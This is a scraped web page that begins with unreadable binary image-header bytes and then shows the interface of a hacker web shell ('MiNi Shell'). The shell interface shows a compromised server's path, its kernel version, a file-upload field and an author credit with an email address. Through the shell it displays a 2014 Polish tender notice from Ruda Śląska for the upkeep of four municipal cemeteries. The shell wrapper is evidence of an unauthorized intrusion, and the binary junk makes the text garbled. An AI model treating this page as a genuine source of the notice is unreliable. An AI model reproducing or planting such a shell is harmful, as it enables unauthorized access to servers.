JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140224/64040-N-2014.html

<p class="kh_header"><b>Ruda Śląska: Utrzymanie i zarządzanie cmentarzami komunalnymi w Rudzie Śląskiej</b><br>
<b>Numer ogłoszenia: 64040 - 2014; data zamieszczenia: 24.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Ruda Śląska , Plac Jana Pawła II 6, 41-709 Ruda Śląska, woj. śląskie, tel. 032 2486281 do 9; 2449094, faks 032 248 7348.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rudaslaska.bip.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i zarządzanie cmentarzami komunalnymi w Rudzie Śląskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje cztery zadania: Zadanie nr I - Utrzymanie i zarządzanie cmentarzem komunalnym wraz z budynkiem, ogrodzeniem i innymi urządzeniami położonymi w Rudzie Śląskiej przy ul. 1-go Maja w dzielnicy Halemba. Zadanie nr II -Utrzymanie i zarządzanie cmentarzem komunalnym wraz z budynkiem, ogrodzeniem i innymi urządzeniami położonymi w Rudzie Śląskiej przy ul. Kardynała Augusta Hlonda oraz przy ul. Adama Huloka w dzielnicy Orzegów. Zadanie nr III- Utrzymanie i zarządzanie dwoma cmentarzami komunalnymi wraz z budynkiem, ogrodzeniem i innymi urządzeniami położonymi w Rudzie Śląskiej przy ul. Chorzowskiej w dzielnicy Nowy Bytom. Zadanie nr IV - Utrzymanie i zarządzanie cmentarzem komunalnym wraz z budynkiem, ogrodzeniem i innymi urządzeniami położonymi w Rudzie Śląskiej przy ul. Porębskiej w dzielnicy Ruda. Szczegółowy opis przedmiotu zamówienia zawiera specyfikacja istotnych warunków zamówienia (SIWZ).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.37.11.11-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał/wykonuje minimum jedną porównywalną usługę polegającą na utrzymywaniu i zarządzaniu cmentarzami przez okres minimum jednego roku, o powierzchni i na kwotę: dla zadania nr 1 - powierzchnia cmentarza minimum 2,0 ha i kwota minimum 15.000 zł brutto, dla zadania nr 2 - powierzchnia cmentarza minimum 3,0 ha i kwota minimum 15.000 zł brutto, dla zadania nr 3 - powierzchnia cmentarza minimum 5,5 ha i kwota minimum 50.000 zł brutto, dla zadania nr 4 - powierzchnia cmentarza minimum 2,0 ha i kwota minimum 25.000 zł brutto. Uwaga: Przy składaniu oferty na więcej niż jedno zadanie, Wykonawca musi wykazać iż wykonał porównywalną/e usługę/i o łącznej kwocie i łącznej powierzchni wynikającej z sumy kwot i sumy powierzchni podanych wyżej dla poszczególnych zadań. W przypadku wykonywania i nie zakończenia jeszcze usługi Wykonawca zobowiązany jest podać na jaką wartość do momentu upływu terminu składania ofert, umowa została wykonana. Wartość ta będzie brana pod uwagę do oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi wykazać, dysponowanie (dysponuje lub będzie dysponować) osobami niezbędnymi do wykonania niniejszego zamówienia w ilości nie mniejszej niż: Zadanie I - szczotka mechaniczna - 1 szt., kosiarka spalinowa - 1 szt., samochód ciężarowy przystosowany do wywozu odpadów lub ciągnik z przyczepą dłużycową - 1 szt, urządzenie ssące/zbierające do zbierania liści i innych odpadów - 1 szt., młot wyburzeniowy z agregatem lub koparko-ładowarka umożliwiająca wykopanie grobu zimą - 1 szt., piła spalinowa - 2 szt. Zadanie II -szczotka mechaniczna - 1 szt., kosiarka spalinowa - 2 szt., samochód ciężarowy przystosowany do wywozu odpadów lub ciągnik z przyczepą dłużycową - 1 szt, urządzenie ssące/zbierające do zbierania liści i innych odpadów - 1 szt., młot wyburzeniowy z agregatem lub koparko-ładowarka umożliwiająca wykopanie grobu zimą - 1 szt., piła spalinowa - 2 szt. Zadanie III szczotka mechaniczna - 2 szt., kosiarka spalinowa - 2 szt., samochód ciężarowy przystosowany do wywozu odpadów lub ciągnik z przyczepą dłużycową - 1 szt, urządzenie ssące/zbierające do zbierania liści i innych odpadów - 1 szt., młot wyburzeniowy z agregatem lub koparko-ładowarka umożliwiająca wykopanie grobu zimą - 1 szt., piła spalinowa - 2 szt. Zadanie IV szczotka mechaniczna - 1 szt., kosiarka spalinowa - 2 szt., samochód ciężarowy przystosowany do wywozu odpadów lub ciągnik z przyczepą dłużycową - 1 szt, urządzenie ssące/zbierające do zbierania liści i innych odpadów - 1 szt., młot wyburzeniowy z agregatem lub koparko-ładowarka umożliwiająca wykopanie grobu zimą - 1 szt. Wykonawca, który złoży ofertę na więcej wybranych zadań musi wykazać, że dysponuje co najmniej dwoma urządzeniami ssąco/zbierającymi do zbierania liści i innych odpadów oraz  koparko-ładowarką umożliwiającą wykopanie kilku  grobów .Pozostały sprzęt wyszczególniony powyżej musi być wykazany w ilości odpowiadającej  sumie poszczególnych jednostek sprzętu. 2. Wykonawca jest zobowiązany do zapewnienia całodobowego kontaktu z Zamawiającym, telefonicznego i za pośrednictwem faksu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, dysponowanie (dysponuje lub będzie dysponować) osobami niezbędnymi do wykonania  niniejszego zamówienia w ilości nie mniejszej niż: Zadanie I - pracownicy posiadający potwierdzone przygotowanie zawodowe w zakresie robót na terenach zieleni parkowej, tj. świadectwo ukończenia szkoły zawodowej, średniej lub wyższej ogrodniczej lub rolniczej - 1 osoba, pracownicy posiadający kurs pilarza - 1 osoba, pracownicy zatrudnieni do wykonywania prac fizycznych (prace porządkowe, kopanie grobów, itp.) 4 osoby, Zadanie II - pracownicy posiadający potwierdzone przygotowanie zawodowe w zakresie robót na terenach zieleni parkowej, tj. świadectwo ukończenia szkoły zawodowej, średniej lub wyższej ogrodniczej lub rolniczej - 1 osoba, pracownicy posiadający kurs pilarza - 1 osoba, pracownicy zatrudnieni do wykonywania prac fizycznych (prace porządkowe, kopanie grobów, itp.) 4 osoby, Zadanie III - pracownicy posiadający potwierdzone przygotowanie zawodowe w zakresie robót na terenach zieleni parkowej, tj. świadectwo ukończenia szkoły zawodowej, średniej lub wyższej ogrodniczej lub rolniczej - 1 osoba, pracownicy posiadający kurs pilarza - 1 osoba, pracownicy zatrudnieni do wykonywania prac fizycznych (prace porządkowe, kopanie grobów, itp.) 6 osób, Zadanie IV - pracownicy posiadający potwierdzone przygotowanie zawodowe w zakresie robót na terenach zieleni parkowej, tj. świadectwo ukończenia szkoły zawodowej, średniej lub wyższej ogrodniczej lub rolniczej - 1 osoba, pracownicy zatrudnieni do wykonywania prac fizycznych (prace porządkowe, kopanie grobów, itp.) 4 osoby.Wykonawca składający ofertę na więcej wybranych zadań musi dysponować łączną liczbą pracowników dla poszczególnych zadań, na które składa ofertę z zastrzeżeniem, iż wystarczające jest niezależnie od liczby zadań dysponowanie przynajmniej jedną osobą posiadającą świadectwo ukończenia szkoły zawodowej, średniej lub wyższej ogrodniczej lub rolniczej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Pod pojęciem głównych usług Zamawiający rozumie usługi polegające na utrzymywaniu i zarządzaniu cmentarzami, w przedmiocie i ilości niezbędnej do wykazania spełniania warunku wiedzy i doświadczenia opisanego powyżej. Dowodami, o których mowa powyżej są: 1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert; 2) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym wyżej mowa. Uwaga: W przypadku, gdy Zamawiający - Miasto Ruda Śląska jest podmiotem, na rzecz którego usługi wskazane w załączniku nr 4 do SIWZ zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W zakresie warunków udziału w postępowaniu opisanych w pkt 2.2 do 2.4. (opis sposobu dokonania oceny spełniania warunków) rozdziału XII SIWZ, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii potwierdzonej za zgodność z oryginałem notarialnie lub kopii poświadczonej za zgodnośc z oryginałem przez podmiot udostępniający zasoby. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących szczególności: a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 2. Oświadczenie, że wykonawca zapoznał się z warunkami zamówienia i złożonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń - na formularzu oferty. 3. Pełnomocnictwo ustanowione do reprezentowania wykonawcy/ów ubiegających się o udzielenie zamówienia publicznego. Pełnomocnictwo należy składać oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie. 4 W zakresie warunku, o którym mowa w sekcji III.3.3) w zakresie zapewnienia całodobowego kontaktu z Zamawiającym należy złożyć pisemne oświadczenie zgodnie z załącznikiem nr 10 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rudaslaska.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ruda Śląska Wydział Zamówień Publicznych (pokój 309) plac Jana Pawła II nr 6 41-709 Ruda Śląska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2014 godzina 11:30, miejsce: Urząd Miasta Ruda Śląska Wydział Zamówień Publicznych (pokój 309) plac Jana Pawła II nr 6 41-709 Ruda Śląska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin realizacji zamówienia podany w sekcji II.2 jest następujący: od dnia zawarcia umowy, nie wcześniej niż od dnia 01.04.2014 r. do dnia 31.03.2015 r. 2. Z uwagi na opis dokonania oceny spełniania warunku Zamawiający nie wymaga podania doświadczenia w wykazie osób, o którym mowa w sekcji III.4.1 3. Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu Zamawiający oceniał będzie na podstawie wymaganych oświadczeń i dokumentów. Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia), nie spełnienie chociażby jednego z postawionych warunków udziału spowoduje wykluczenie Wykonawcy z postępowania. 4. W przypadku przedstawienia przez wykonawcę, w celu wykazania spełniania warunków, dokumentów, w których występuje waluta inna niż polska, w celu jej przeliczenia stosowany będzie średni kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie i zarządzanie cmentarzem komunalnym wraz z budynkiem, ogrodzeniem  i innymi urządzeniami położonymi w Rudzie Śląskiej przy ul. 1-go Maja w dzielnicy Halemba.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dane cmentarza: a)  powierzchnia ogółem -  2,26 ha, b)  powierzchnia alejek   - 2.838 m2 ( łącznie z placem wokół domu przedpogrzebowego, drogą dojazdową i parkingiem) , c)   trawniki -  1.886 m2, d)  dom przedpogrzebowy, e)  wazy - 4 szt. o powierzchni 4,4 m2 każda, f)   krzyż oraz ławki (siedziska), g)  ogrodzenie, h)  oświetlenie, i)  drzewa i krzewy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.37.11.11-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie i zarządzanie cmentarzem komunalnym wraz z budynkiem, ogrodzeniem i innymi urządzeniami położonymi w Rudzie Śląskiej przy ul. Kardynała Augusta Hlonda oraz przy ul. Adama Huloka w dzielnicy Orzegów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dane cmentarza: 1) istniejący: a) pow. ogółem - 2,73 ha, b) pow. alejek - 1.711,5 m2 (łączenie z chodnikiem przed cmentarzem), c) trawniki - 802 m2, d) dom przedpogrzebowy przy ul. Huloka + 80 m2 - chodnik przyległy, e) pomieszczenie gospodarcze, f) krzyż, g) ogrodzenie, h drzewa i krzewy, 2) nowy (poszerzenie): a) pow. ogółem - 0,7 ha, b) pow. alejek - 2.128 m2, c) pow. chodników przyległych do cmentarza - 1.010 m2, d) trawniki - 1.022 m2, e) żywopłot, f) krzyż, g) placyk gospodarczy, h) ogrodzenie, i) drzewa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.37.11.11-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Utrzymanie i zarządzanie dwoma cmentarzami komunalnymi wraz z budynkiem, ogrodzeniem i innymi urządzeniami położonymi w Rudzie Śląskiej przy ul. Chorzowskiej w dzielnicy Nowy Bytom.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Dane o cmentarzach: 1. Cmentarz nowy: a)  pow. ogółem - 4,43 ha, b)  pow. alejek - 3,693 m2 (łącznie z placem wokół domu przedpogrzebowego oraz chodnikiem przed cmentarzem) + parking (360 m2), c)  żywopłot - 861 mb, d)   trawniki - 1.753 m2, e)   kwietniki - 1,9 m2,  f)   wazy 6 szt. - 6,6 m2, g)  dom przedpogrzebowy,	h)  krzyż + ściana pamięci, i)   oświetlenie, j)   ogrodzenie, k)  drzewa i krzewy, 2. Cmentarz stary: a)  pow. ogólna - 1,2 ha, b)  pow. alejek - 1.110 m2, (łącznie z chodnikiem przed cmentarzem), c)  wazy 2 szt. 3,3 m2,        d)  krzyż, e)  drzewa, f)  ławka - 1 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.37.11.11-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Utrzymanie i zarządzanie cmentarzem komunalnym wraz z budynkiem, ogrodzeniem i innymi urządzeniami położonymi w Rudzie Śląskiej, przy ul. Porębskiej w dzielnicy Ruda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dane cmentarza: a)  pow. ogółem  -  2,24 ha, b)  trawniki  -  1.637 m2, c)  pow. alejek - 3.892,4 m2 (łącznie z placem wokół domu przedpogrzebowego i parkingiem), d)  dom przedpogrzebowy, e)  ławki - 3szt., f)   krzyż, g) ogrodzenie + kolumbarium, h)  oświetlenie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.37.11.11-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com